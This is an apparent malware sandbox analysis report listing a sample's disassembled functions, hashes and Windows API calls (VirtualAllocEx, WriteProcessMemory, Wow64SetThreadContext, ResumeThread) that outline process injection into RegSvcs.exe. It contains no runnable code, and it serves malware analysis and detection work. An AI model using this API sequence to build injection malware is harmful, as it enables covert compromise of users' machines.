                                                                  Function 07FAC8F1 Relevance: 1.6, APIs: 1, Instructions: 72injectionCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 246 7fac8f1-7fac946 248 7fac948-7fac954 246->248 249 7fac956-7fac995 WriteProcessMemory 246->249 248->249 251 7fac99e-7fac9ce 249->251 252 7fac997-7fac99d 249->252 252->251
                                                                  APIs
                                                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07FAC988
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.2569875582.0000000007FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FA0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_7fa0000_rlJvZXSinaRi.jbxd
                                                                  Similarity
                                                                  • API ID: MemoryProcessWrite
                                                                  • String ID:
                                                                  • API String ID: 3559483778-0
                                                                  • Opcode ID: c1598b7d1c910333fa594023f4b2cd8bc1c5746d14436819b86a46fe03ce19c9
                                                                  • Instruction ID: 3263515a08e7793afd59c13bc55255c739e8e86d9143c19c5d7e9ce5ec27151e
                                                                  • Opcode Fuzzy Hash: c1598b7d1c910333fa594023f4b2cd8bc1c5746d14436819b86a46fe03ce19c9
                                                                  • Instruction Fuzzy Hash: 9C2146B58003499FDB10CFA9C880BEEBBF0BF88310F14842AE919A7250D7799944CBA0
                                                                  Function 07FAC320 Relevance: 1.6, APIs: 1, Instructions: 69threadCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 256 7fac320-7fac373 258 7fac383-7fac3b3 Wow64SetThreadContext 256->258 259 7fac375-7fac381 256->259 261 7fac3bc-7fac3ec 258->261 262 7fac3b5-7fac3bb 258->262 259->258 262->261
                                                                  APIs
                                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07FAC3A6
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.2569875582.0000000007FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FA0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_7fa0000_rlJvZXSinaRi.jbxd
                                                                  Similarity
                                                                  • API ID: ContextThreadWow64
                                                                  • String ID:
                                                                  • API String ID: 983334009-0
                                                                  • Opcode ID: 5d4ff555754a2fb06014f851a074f6e0239f56fccfc78ccfb38b959aecbfcee8
                                                                  • Instruction ID: 8cddde66cb10f06149b477857948c4db4692e3eabae804fd6d9037dfeffdaaf0
                                                                  • Opcode Fuzzy Hash: 5d4ff555754a2fb06014f851a074f6e0239f56fccfc78ccfb38b959aecbfcee8
                                                                  • Instruction Fuzzy Hash: F1212AB1D003099FDB10CFAAC4857EEBBF4AF88324F14842ED559A7640D7799945CFA1
                                                                  Function 07FAC8F8 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 266 7fac8f8-7fac946 268 7fac948-7fac954 266->268 269 7fac956-7fac995 WriteProcessMemory 266->269 268->269 271 7fac99e-7fac9ce 269->271 272 7fac997-7fac99d 269->272 272->271
                                                                  APIs
                                                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07FAC988
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.2569875582.0000000007FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FA0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_7fa0000_rlJvZXSinaRi.jbxd
                                                                  Similarity
                                                                  • API ID: MemoryProcessWrite
                                                                  • String ID:
                                                                  • API String ID: 3559483778-0
                                                                  • Opcode ID: 74f26f308aba3b3f6fcbc82142c3b9d053abd84fea885dd9ca02eb11488a0ca2
                                                                  • Instruction ID: 2bf18330185d5be456647e370a999fe766d0fafa42728e274c8d4c71978697cf
                                                                  • Opcode Fuzzy Hash: 74f26f308aba3b3f6fcbc82142c3b9d053abd84fea885dd9ca02eb11488a0ca2
                                                                  • Instruction Fuzzy Hash: F02128B59003499FDB10CFA9C884BDEBBF5FF48310F14842AE919A7250D779A944CBA4
                                                                  Function 07FAC9E0 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 276 7fac9e0-7faca75 ReadProcessMemory 279 7faca7e-7facaae 276->279 280 7faca77-7faca7d 276->280 280->279
                                                                  APIs
                                                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07FACA68
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.2569875582.0000000007FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FA0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_7fa0000_rlJvZXSinaRi.jbxd
                                                                  Similarity
                                                                  • API ID: MemoryProcessRead
                                                                  • String ID:
                                                                  • API String ID: 1726664587-0
                                                                  • Opcode ID: e57cdaaf0ee522c2d0ed88fddd158dbfa7b97ca322587406644b08955049a565
                                                                  • Instruction ID: 8035868598e4b2c7815db900d7a377ae89936d24c55106fc96b77356fd5ab905
                                                                  • Opcode Fuzzy Hash: e57cdaaf0ee522c2d0ed88fddd158dbfa7b97ca322587406644b08955049a565
                                                                  • Instruction Fuzzy Hash: 2F2139B1C003499FDB10DFAAC884BEEBBF1FF48710F10842AE918A7250D7799940CBA1
                                                                  Function 07FAC328 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 284 7fac328-7fac373 286 7fac383-7fac3b3 Wow64SetThreadContext 284->286 287 7fac375-7fac381 284->287 289 7fac3bc-7fac3ec 286->289 290 7fac3b5-7fac3bb 286->290 287->286 290->289
                                                                  APIs
                                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07FAC3A6
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.2569875582.0000000007FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FA0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_7fa0000_rlJvZXSinaRi.jbxd
                                                                  Similarity
                                                                  • API ID: ContextThreadWow64
                                                                  • String ID:
                                                                  • API String ID: 983334009-0
                                                                  • Opcode ID: 4fb1d6c8174f52500a98ae0fedba0878d13528e788468327569cfb9234c2160b
                                                                  • Instruction ID: 4a670b3d4e54d7eac78960fd26569069dc3b149694aa5eb455f4230d88336750
                                                                  • Opcode Fuzzy Hash: 4fb1d6c8174f52500a98ae0fedba0878d13528e788468327569cfb9234c2160b
                                                                  • Instruction Fuzzy Hash: 602118B1D003099FDB10DFAAC4847EEBBF4EF88724F14842AD559A7240D779A944CFA1
                                                                  Function 07FAC9E8 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 294 7fac9e8-7faca75 ReadProcessMemory 297 7faca7e-7facaae 294->297 298 7faca77-7faca7d 294->298 298->297
                                                                  APIs
                                                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07FACA68
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.2569875582.0000000007FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FA0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_7fa0000_rlJvZXSinaRi.jbxd
                                                                  Similarity
                                                                  • API ID: MemoryProcessRead
                                                                  • String ID:
                                                                  • API String ID: 1726664587-0
                                                                  • Opcode ID: 024c0cecb1089659352b07d0c4074f479369eee23061b560fde3aefd20b9ab3a
                                                                  • Instruction ID: 3cf6ffb1e21821c28443d48f0917e5f94bfb0c490ff0d51a0e6889996286699b
                                                                  • Opcode Fuzzy Hash: 024c0cecb1089659352b07d0c4074f479369eee23061b560fde3aefd20b9ab3a
                                                                  • Instruction Fuzzy Hash: AF212AB1C003499FDB10CFAAC884BEEBBF5FF48710F50842AE519A7250C7799944CBA1
                                                                  Function 07FAC831 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 302 7fac831-7fac8b3 VirtualAllocEx 305 7fac8bc-7fac8e1 302->305 306 7fac8b5-7fac8bb 302->306 306->305
                                                                  APIs
                                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07FAC8A6
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.2569875582.0000000007FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FA0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_7fa0000_rlJvZXSinaRi.jbxd
                                                                  Similarity
                                                                  • API ID: AllocVirtual
                                                                  • String ID:
                                                                  • API String ID: 4275171209-0
                                                                  • Opcode ID: 6012d4e1b9f52bffddcd5954dba32b28d54e974850380878b0e6b6336c75651f
                                                                  • Instruction ID: 1400892fc31ff387f6cdc842f2c7feb2ddb2fdea37efe988495da6ae4248cca2
                                                                  • Opcode Fuzzy Hash: 6012d4e1b9f52bffddcd5954dba32b28d54e974850380878b0e6b6336c75651f
                                                                  • Instruction Fuzzy Hash: 2B1147B28002499FDB10CFAAD844BEEBFF5FF88724F14881AD515A7250C775A954CFA0
                                                                  Function 07FAC270 Relevance: 1.6, APIs: 1, Instructions: 54threadCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 310 7fac270-7fac2e7 ResumeThread 313 7fac2e9-7fac2ef 310->313 314 7fac2f0-7fac315 310->314 313->314
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.2569875582.0000000007FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FA0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_7fa0000_rlJvZXSinaRi.jbxd
                                                                  Similarity
                                                                  • API ID: ResumeThread
                                                                  • String ID:
                                                                  • API String ID: 947044025-0
                                                                  • Opcode ID: 975db18d72cb8bce24c3b806baba7f7cada629c12aab488f7dda78a9535b1917
                                                                  • Instruction ID: d2e8d7a484a9612777881ffe4596d9a85533e7096289503b022aa182f4b8700c
                                                                  • Opcode Fuzzy Hash: 975db18d72cb8bce24c3b806baba7f7cada629c12aab488f7dda78a9535b1917
                                                                  • Instruction Fuzzy Hash: C91134B18003498FDB20CFAAC4847EEBBF4AF88724F14845AC519A7650CB796945CFA1
                                                                  Function 07FAC838 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 318 7fac838-7fac8b3 VirtualAllocEx 321 7fac8bc-7fac8e1 318->321 322 7fac8b5-7fac8bb 318->322 322->321
                                                                  APIs
                                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07FAC8A6
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.2569875582.0000000007FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FA0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_7fa0000_rlJvZXSinaRi.jbxd
                                                                  Similarity
                                                                  • API ID: AllocVirtual
                                                                  • String ID:
                                                                  • API String ID: 4275171209-0
                                                                  • Opcode ID: 303efdecd91741c7fd8081d607cba6f6405d317a8d293814f2fa22f4928569be
                                                                  • Instruction ID: 4eacb757894b47fcd1ac5be5c288b139d17475b8700688db424171cd21816ddc
                                                                  • Opcode Fuzzy Hash: 303efdecd91741c7fd8081d607cba6f6405d317a8d293814f2fa22f4928569be
                                                                  • Instruction Fuzzy Hash: 631126B18002499FDB10DFAAC844BEFBFF5EF88720F14881AE515A7250C775A944CFA1
                                                                  Function 0164F078 Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 326 164f078-164f0c4 328 164f0c6-164f0ee KiUserCallbackDispatcher 326->328 329 164f112-164f12b 326->329 330 164f0f7-164f10b 328->330 331 164f0f0-164f0f6 328->331 330->329 331->330
                                                                  APIs
                                                                  • KiUserCallbackDispatcher.NTDLL(0000004B), ref: 0164F0DD
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.2554268698.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1640000_rlJvZXSinaRi.jbxd
                                                                  Similarity
                                                                  • API ID: CallbackDispatcherUser
                                                                  • String ID:
                                                                  • API String ID: 2492992576-0
                                                                  • Opcode ID: cf0efd7bb5e18c065d4b3478b1095c6fb003315a3552536033c107217bfe21cd
                                                                  • Instruction ID: e8fd0a3746387d34b43276653a3120a97fc7efc252ce86cac6e4f1a072fe3934
                                                                  • Opcode Fuzzy Hash: cf0efd7bb5e18c065d4b3478b1095c6fb003315a3552536033c107217bfe21cd
                                                                  • Instruction Fuzzy Hash: F811BFB1905389CFDB10DF5AC9047DEBFF4EB49714F108499D588A7242D379AA04CBA1
                                                                  Function 07FAC278 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 333 7fac278-7fac2e7 ResumeThread 336 7fac2e9-7fac2ef 333->336 337 7fac2f0-7fac315 333->337 336->337
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.2569875582.0000000007FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FA0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_7fa0000_rlJvZXSinaRi.jbxd
                                                                  Similarity
                                                                  • API ID: ResumeThread
                                                                  • String ID:
                                                                  • API String ID: 947044025-0
                                                                  • Opcode ID: 1814e69d1e819eb91bbd677ab987304b4e431ad0a1ddc2cc3ed3186e4671e89b
                                                                  • Instruction ID: 33c238c94659ab65e6c7eb544babf245b43b7e9e5ac014aa3c627d4ecae45530
                                                                  • Opcode Fuzzy Hash: 1814e69d1e819eb91bbd677ab987304b4e431ad0a1ddc2cc3ed3186e4671e89b
                                                                  • Instruction Fuzzy Hash: BF1128B1D003498FDB20DFAAC4447EEFBF4AF88724F14841AD519A7240CB796944CFA5
                                                                  Function 057B1188 Relevance: 1.5, APIs: 1, Instructions: 48windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • PostMessageW.USER32(?,?,?,?), ref: 057B11ED
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.2568607319.00000000057B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057B0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_57b0000_rlJvZXSinaRi.jbxd
                                                                  Similarity
                                                                  • API ID: MessagePost
                                                                  • String ID:
                                                                  • API String ID: 410705778-0
                                                                  • Opcode ID: dea41bd93f212d398578a5912102d319f0c8e41661291d4127ed137aac5a6419
                                                                  • Instruction ID: 3d9b5b0d4863898481fa2f0b85cbe66e3aa3bf97cb4ca5d90e4cbf8d6b9dd7d1
                                                                  • Opcode Fuzzy Hash: dea41bd93f212d398578a5912102d319f0c8e41661291d4127ed137aac5a6419
                                                                  • Instruction Fuzzy Hash: 7F11F5B5900349DFDB10DF9AD885BDEBBF8FB48720F108419E519A7200D375AA44CFA1
                                                                  Function 057B1190 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • PostMessageW.USER32(?,?,?,?), ref: 057B11ED
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.2568607319.00000000057B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057B0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_57b0000_rlJvZXSinaRi.jbxd
                                                                  Similarity
                                                                  • API ID: MessagePost
                                                                  • String ID:
                                                                  • API String ID: 410705778-0
                                                                  • Opcode ID: b7779168707521660d8677795e5d063c5a94c9b98f9546a899348c43ec62c63e
                                                                  • Instruction ID: cf01a4926c5d613bdaebba1e5f82a87ed297294d3ccb1777a13e4b6751670715
                                                                  • Opcode Fuzzy Hash: b7779168707521660d8677795e5d063c5a94c9b98f9546a899348c43ec62c63e
                                                                  • Instruction Fuzzy Hash: B01103B5800349DFDB10CF9AC884BDEBBF8EB48720F10841AD518A7200C375AA44CFA1
                                                                  Function 0154D4A0 Relevance: .1, Instructions: 75COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.2553656151.000000000154D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0154D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_154d000_rlJvZXSinaRi.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5598fe175b4ebcd087c4ce52d3bbb4eaeadc59345ac05c0a2e8adbddf5ec4754
                                                                  • Instruction ID: e5108adb0fd84aee09415eb91bded8bcdb64b3c72dfaecb697387fdddef86b75
                                                                  • Opcode Fuzzy Hash: 5598fe175b4ebcd087c4ce52d3bbb4eaeadc59345ac05c0a2e8adbddf5ec4754
                                                                  • Instruction Fuzzy Hash: 822133B2500200DFDB05DF48D9C0B6ABFB1FB98318F20856CE90A0F256C776D856CBA2
                                                                  Function 0155D1D4 Relevance: .1, Instructions: 72COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.2553696470.000000000155D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0155D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_155d000_rlJvZXSinaRi.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 418a4c0a1b00765ad1d3a293a07406500a3d9a758d050a2c7093eb1abc22bb59
                                                                  • Instruction ID: 6819d5da57ae7f02b71c53011bd09764dd12e6e1f43992d894291f6313e0be22
                                                                  • Opcode Fuzzy Hash: 418a4c0a1b00765ad1d3a293a07406500a3d9a758d050a2c7093eb1abc22bb59
                                                                  • Instruction Fuzzy Hash: 5C210372504200EFDB41DF94C5D0B1ABBB1FB88324F20C96EDD094F252C37AD846CA61
                                                                  Function 0155D01C Relevance: .1, Instructions: 72COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.2553696470.000000000155D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0155D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_155d000_rlJvZXSinaRi.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 84459a020d7745f65ba6cf05ddcdb41e6b0e573759b7f88de43d03fa1b4810f9
                                                                  • Instruction ID: 0d6232d784a3635d941f66b57b06cda1310101efd375e47db4447c3a6c075d39
                                                                  • Opcode Fuzzy Hash: 84459a020d7745f65ba6cf05ddcdb41e6b0e573759b7f88de43d03fa1b4810f9
                                                                  • Instruction Fuzzy Hash: E7210076604204DFDB55DF58D990B2ABBB1FB88314F20C96EDD0A4F262D33AD847CA61
                                                                  Function 0155D005 Relevance: .1, Instructions: 63COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.2553696470.000000000155D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0155D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_155d000_rlJvZXSinaRi.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5c605dd613165913d4f0e3ebcfc63c7336a738dcc24d55a37bbe5f32962888d6
                                                                  • Instruction ID: ed2aa18031d3e22c9c22cdda018a8f7641a37021a19ec8344e3619d959c1f660
                                                                  • Opcode Fuzzy Hash: 5c605dd613165913d4f0e3ebcfc63c7336a738dcc24d55a37bbe5f32962888d6
                                                                  • Instruction Fuzzy Hash: 652183755083849FDB02CF24D994715BF71FB46214F28C5DAD8498F2A7D33A9806CB62
                                                                  Function 0154D49B Relevance: .1, Instructions: 56COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.2553656151.000000000154D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0154D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_154d000_rlJvZXSinaRi.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: cfb52f8b9dfce4186a4761286b1afaf252fc13293eafdb1bf8f112f6695a61f7
                                                                  • Instruction ID: 5b0667cc5cdd74b9f21bd983b1a40ea8e41baae513212f7652249b18d7e89105
                                                                  • Opcode Fuzzy Hash: cfb52f8b9dfce4186a4761286b1afaf252fc13293eafdb1bf8f112f6695a61f7
                                                                  • Instruction Fuzzy Hash: A211AF76504280CFDB16CF58D5C4B5ABF71FB94328F2486A9D9090B257C33AD456CBA2
                                                                  Function 0155D1CF Relevance: .1, Instructions: 53COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.2553696470.000000000155D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0155D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_155d000_rlJvZXSinaRi.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2ccfe305154e95a536d18b49939e535c9c69fd109e9eb5688aea898868e671a0
                                                                  • Instruction ID: 2540aa2b4cf0d29dde1db56616c2ac6059d3761a680bfe944b2af964511ebbc7
                                                                  • Opcode Fuzzy Hash: 2ccfe305154e95a536d18b49939e535c9c69fd109e9eb5688aea898868e671a0
                                                                  • Instruction Fuzzy Hash: 0F11BB76504280DFCB42CF54C5D0B19BBB1FB84224F24C6AEDC494F696C33AD44ACB61

                                                                  Execution Graph

                                                                  Execution Coverage:0.1%
                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                  Signature Coverage:0%
                                                                  Total number of Nodes:1
                                                                  Total number of Limit Nodes:0
                                                                  execution_graph 62852 19b2c1d LdrInitializeThunk

                                                                  Executed Functions

                                                                  Function 019B2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 0 19b2c0a-19b2c0f 1 19b2c1f-19b2c26 LdrInitializeThunk 0->1 2 19b2c11-19b2c18 0->2
                                                                  APIs
                                                                  • LdrInitializeThunk.NTDLL(019CFD4F,000000FF,00000024,01A66634,00000004,00000000,?,-00000018,7D810F61,?,?,01988B12,?,?,?,?), ref: 019B2C24
                                                                  Memory Dump Source
                                                                  • Source File: 00000011.00000002.2710676018.0000000001966000.00000040.00001000.00020000.00000000.sdmp, Offset: 01940000, based on PE: true
                                                                  • Associated: 00000011.00000002.2710676018.0000000001940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.0000000001947000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.00000000019C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.00000000019C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A02000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A63000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_17_2_1940000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 59c926e8ad3f749f031143552928866c23f695cce07cbd687ae47eba1740bac4
                                                                  • Instruction ID: 2671905b16960eb7a1cf2b8e55f745b529dd6f263d206da91a652c66d3e9cd7e
                                                                  • Opcode Fuzzy Hash: 59c926e8ad3f749f031143552928866c23f695cce07cbd687ae47eba1740bac4
                                                                  • Instruction Fuzzy Hash: 6CB09B71D015C5C5DA11E764470C7177A44B7D0702F15C065D2470641F4739D5D1E276
                                                                  Function 019B2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 5 19b2df0-19b2dfc LdrInitializeThunk
                                                                  APIs
                                                                  • LdrInitializeThunk.NTDLL(019EE73E,0000005A,01A4D040,00000020,00000000,01A4D040,00000080,019D4A81,00000000,-00000001,-00000001,00000002,00000000,?,-00000001,019BAE00), ref: 019B2DFA
                                                                  Memory Dump Source
                                                                  • Source File: 00000011.00000002.2710676018.0000000001966000.00000040.00001000.00020000.00000000.sdmp, Offset: 01940000, based on PE: true
                                                                  • Associated: 00000011.00000002.2710676018.0000000001940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.0000000001947000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.00000000019C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.00000000019C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A02000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A63000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_17_2_1940000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: bdbe98773f166c4b03beb97bc556d95f5a3b4bbdd9d7530fe07f9f36ae1c034a
                                                                  • Instruction ID: b6ba6445005381e23c074b49bc5fc46735f2de8aa1404d9ada11d2f24677947e
                                                                  • Opcode Fuzzy Hash: bdbe98773f166c4b03beb97bc556d95f5a3b4bbdd9d7530fe07f9f36ae1c034a
                                                                  • Instruction Fuzzy Hash: A690023120150413D111715D4508707404D97D0641F95C416A0864558DD6578A52A222
                                                                  Function 019B2C1D Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 4 19b2c1d-19b2c26 LdrInitializeThunk
                                                                  APIs
                                                                  • LdrInitializeThunk.NTDLL(019CFD4F,000000FF,00000024,01A66634,00000004,00000000,?,-00000018,7D810F61,?,?,01988B12,?,?,?,?), ref: 019B2C24
                                                                  Memory Dump Source
                                                                  • Source File: 00000011.00000002.2710676018.0000000001966000.00000040.00001000.00020000.00000000.sdmp, Offset: 01940000, based on PE: true
                                                                  • Associated: 00000011.00000002.2710676018.0000000001940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.0000000001947000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.00000000019C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.00000000019C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A02000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A63000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_17_2_1940000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: b497df8a9bee1b1d6ddce710c28593f98a6e1f4d4afb39ff49d3449b06f62be0
                                                                  • Instruction ID: 51c9b72bffae7835ef487a73c59b28abb1babaab401de615241266cb9fb3bf4c
